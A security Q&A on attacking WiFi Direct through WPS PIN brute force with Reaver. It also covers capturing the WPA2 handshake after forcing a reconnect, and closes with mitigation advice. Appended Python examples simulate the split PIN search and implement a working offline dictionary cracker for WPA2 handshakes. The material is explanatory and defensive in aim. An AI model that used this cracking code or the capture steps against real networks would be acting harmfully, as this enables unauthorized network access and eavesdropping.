
So far, I haven't seen any PoC or real-world attacks against WiFi Direct, but I see the potential because it relies on WiFi Protected Setup (WPS) for establishing the connection.

Tools like Reaver already exist to attack WPS during the connection establishment phase and compromise a traditional infrastructure network set up by a wireless router.

But what if someone used Reaver to attack the WPS setup between two devices using WiFi Direct (like a WiDi or Miracast screencasting session)?

Would they be able to eavesdrop on and slurp the traffic of the session? Would it yield a WPA2 key or passphrase that could be reused to attack the same workstation, set-top box, or whatever again and again?

chikpee

  • Possible duplicate of "[what makes pinless wi fi direct using wps on android secure](http://security.stackexchange.com/questions/25958/what-makes-pinless-wi-fi-direct-using-wps-on-android-secure?rq=1)", although the answer is somewhat shoddy. – Rubber Duck Dec 16 '13 at 21:43

1 Answer


As a preamble for other readers, note that the WPS vulnerability was made possible because of the way it was designed by the WiFi Alliance, not as a vulnerability with WPA2 itself. A good write-up on the WPS vulnerability is here. In a nutshell, the goal of it was originally to require 100,000,000 authentication attempts to brute-force the 8-digit pin, but the way it was implemented only used the first 7 parts of the pin, and only authenticated the 8-digit pin in halves (first 4 digits of the pin first, then the last 3 + checksum), effectively reducing the brute-force worst-case attempts to 11,000 (10^4 + 10^3).

So with WiFi Direct (also created by the WiFi Alliance), the goal is to get rid of the access point altogether and incorporate it into the computer. Essentially, the system's wireless NIC is able to act as both an AP and a bridge - a feature available in some third-party wireless NICs already (e.g., Alfa cards and their client software). Like you mentioned, the WPS setup occurs between two devices using WiFi Direct. If configured using the PIN-based WPS, then a non-physical attack with Reaver is possible. The other WPS methods (push-button, NFC) will require physical access to the device acting as an AP.

So let's say you've successfully attacked the PIN and retrieved it. "Would they be able to eavesdrop on and slurp the traffic of the session?" Yes, but it would still be encrypted. WiFi Direct requires WPA2 or the "latest WiFi security." WPA2 encrypts every session dynamically using the extensible authentication protocol (EAP). If you've cracked the PIN with Reaver and gained access, your next move would be to disconnect and force a re-connect of the connected client. This will force a new exchange of the EAP keys (seen as EAPOL in Wireshark). I believe you need the first half of the four-way EAP handshake to properly decrypt the traffic, but preferably the first 3 or even all four of the packets. You'll need these EAP keys for every session you attempt to decrypt, and remember, every session between every client has a different EAP exchange. Otherwise, even with a cracked PIN, or some other method you use to gain access to the WPA2-protected network, you will still be unable to view the contents of the traffic.

"Would it yield a WPA2 key or passphrase that could be reused to attack the same workstation, set-top box, or whatever again and again?" Yes, if you've configured one. A successful Reaver crack will yield the WPA passphrase anyway.

How do I prevent this? As many people and sites have already pointed out, don't use PIN-based WPS. Go the inconvenient route, even with WiFi Direct, and use the traditional SSID and complex passphrase.

Risinek

  • Correction on the number of guesses to break WPS: it's 10000 at most to break the first half, then 1000 at most for the second half (the checksum gives you one digit for free when attacking the second half, making it effectively 3 digits), for a maximum of 11,000 guesses and an average of 5500. – Mark May 23 '14 at 05:33
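The split PIN search that the answer and Mark's comment describe, as an added example (not code from the question, the answer, or Reaver). The Enrollee/Registrar exchange is reduced to an oracle: a real AP leaks the same two facts by answering M4 with M5 or a NACK (first half of the PIN) and M6 with M7 or a NACK (second half). No real WPS messages or hashes are modelled, and the target PINs are constructed.

```python
"""Simulation of the split WPS PIN brute force that Reaver exploits.

Added example, not from the original question or answer. The real
Enrollee/Registrar exchange is reduced to an oracle: the AP leaks the same
two bits of information through whether it answers M4 with M5 or a NACK
(first half of the PIN) and M6 with M7 or a NACK (second half). No real
WPS messages or hashes are modelled; the PINs below are constructed.
"""


def wps_checksum(first7: int) -> int:
    """Checksum digit of an 8-digit WPS PIN, computed over the first 7 digits
    (same algorithm as wps_pin_checksum() in hostapd/wpa_supplicant)."""
    accum = 0
    while first7:
        accum += 3 * (first7 % 10)
        first7 //= 10
        accum += first7 % 10
        first7 //= 10
    return (10 - accum % 10) % 10


def is_valid_pin(pin8: int) -> bool:
    return 0 <= pin8 <= 99999999 and pin8 % 10 == wps_checksum(pin8 // 10)


class WpsOracle:
    """Stands in for the WPS Enrollee (the device acting as AP / group owner)."""

    def __init__(self, pin8: int):
        if not is_valid_pin(pin8):
            raise ValueError("PIN fails the WPS checksum")
        self.first_half = pin8 // 10000    # digits 1-4
        self.second_half = pin8 % 10000    # digits 5-7 + checksum digit
        self.attempts = 0

    def respond(self, pin8: int) -> str:
        """What the attacker observes after sending a candidate PIN."""
        self.attempts += 1
        if pin8 // 10000 != self.first_half:
            return "M4_NACK"   # first half wrong: session aborts after M4
        if pin8 % 10000 != self.second_half:
            return "M6_NACK"   # first half right, second half wrong
        return "M7"            # full PIN accepted; M7 carries the WPA PSK


def split_attack(oracle: WpsOracle):
    """Recover the PIN in at most 10**4 + 10**3 attempts instead of 10**7."""
    first_half = None
    for cand in range(10000):
        # The second half is a placeholder: it is never evaluated until the
        # first half is right, which is exactly the design flaw.
        if oracle.respond(cand * 10000) != "M4_NACK":
            first_half = cand
            break
    if first_half is None:
        return None
    for cand in range(1000):
        # Only 3 free digits remain; the 8th is fixed by the checksum.
        pin8 = first_half * 10000 + cand * 10 + wps_checksum(first_half * 1000 + cand)
        if oracle.respond(pin8) == "M7":
            return pin8
    return None


if __name__ == "__main__":
    oracle = WpsOracle(12345670)  # constructed target PIN (a common default)
    print(split_attack(oracle), "after", oracle.attempts, "attempts")
```

Against the PIN 99999995 the oracle is queried exactly 11,000 times, the worst case Mark's comment gives; a PIN-less method (push-button or NFC) never exposes this oracle to a remote attacker at all.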
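The handshake-capture step the answer describes (why a recovered PSK still does not decrypt a session until you have the EAPOL-Key exchange), as an added example that is not part of the original answer. It derives the per-session keys from the PMK, the two MAC addresses and the two nonces of a WPA2-PSK 4-way handshake, and runs the offline check a tool like aircrack-ng performs against the MIC on message 2. The MAC addresses, nonces and EAPOL frame are constructed sample data; the PMK for "password"/"IEEE" is the PBKDF2 test vector from IEEE 802.11i Annex H.

```python
"""WPA2-PSK key derivation from the 4-way handshake (EAPOL-Key frames).

Added example, not from the original answer. Shows why a cracked PSK or PIN
alone does not decrypt traffic: the temporal key depends on the ANonce
(message 1) and SNonce (message 2) of each handshake, and the MIC on
message 2 is what a cracker verifies candidate passphrases against.
All MAC addresses, nonces and frame bytes below are constructed.
"""
import hashlib
import hmac


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def derive_ptk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes):
    """PTK = PRF-512(PMK, "Pairwise key expansion",
                     min(AA,SPA) || max(AA,SPA) || min(ANonce,SNonce) || max(ANonce,SNonce))
    Returns (KCK, KEK, TK), 16 bytes each for CCMP."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    label = b"Pairwise key expansion"
    out = b""
    for i in range(4):  # 4 x 160 bits >= 512 bits
        out += hmac.new(pmk, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
    ptk = out[:64]
    return ptk[:16], ptk[16:32], ptk[32:48]


def eapol_mic(kck: bytes, eapol_frame_mic_zeroed: bytes) -> bytes:
    """WPA2 (AKM 00-0F-AC:2) EAPOL-Key MIC: HMAC-SHA1 over the frame with the
    MIC field zeroed, truncated to 128 bits."""
    return hmac.new(kck, eapol_frame_mic_zeroed, hashlib.sha1).digest()[:16]


def crack_passphrase(candidates, ssid, ap_mac, sta_mac, anonce, snonce, m2_zeroed, m2_mic):
    """Offline dictionary attack against a captured message 1/2 pair: only the
    ANonce, SNonce, both MACs and the message 2 MIC are needed."""
    for cand in candidates:
        kck, _, _ = derive_ptk(pmk_from_passphrase(cand, ssid), ap_mac, sta_mac, anonce, snonce)
        if hmac.compare_digest(eapol_mic(kck, m2_zeroed), m2_mic):
            return cand
    return None


# Constructed sample session (not a real capture).
SSID = "IEEE"
PASSPHRASE = "password"
AP_MAC = bytes.fromhex("001122334455")
STA_MAC = bytes.fromhex("66778899aabb")
ANONCE = bytes(range(32))        # taken from message 1
SNONCE = bytes(range(32, 64))    # taken from message 2
# Message 2 as an EAPOL-Key frame with its MIC field zeroed: EAPOL header
# (v1, type Key, length 0x5f), descriptor 2, key info 0x010a, key length 0,
# replay counter 1, SNonce, then zeroed IV/RSC/ID/MIC/key-data-length.
M2_ZEROED = (bytes.fromhex("0103005f02010a0000" + "0000000000000001")
             + SNONCE + bytes(16 + 8 + 8 + 16 + 2))
_kck, _, _ = derive_ptk(pmk_from_passphrase(PASSPHRASE, SSID), AP_MAC, STA_MAC, ANONCE, SNONCE)
M2_MIC = eapol_mic(_kck, M2_ZEROED)  # the MIC a real message 2 would carry


if __name__ == "__main__":
    print("recovered:", crack_passphrase(["letmein", "password", "hunter2"], SSID,
                                         AP_MAC, STA_MAC, ANONCE, SNONCE, M2_ZEROED, M2_MIC))
    tk_a = derive_ptk(pmk_from_passphrase(PASSPHRASE, SSID), AP_MAC, STA_MAC, ANONCE, SNONCE)[2]
    tk_b = derive_ptk(pmk_from_passphrase(PASSPHRASE, SSID), AP_MAC, STA_MAC, ANONCE, bytes(32))[2]
    print("same PSK, different SNonce, same TK?", tk_a == tk_b)
```

Because the nonces enter the PRF, every reconnect of the same client yields a different TK even though the PMK never changes; capturing messages 1 and 2 of that reconnect is what lets a passive observer (or Wireshark, given the PSK) rebuild it.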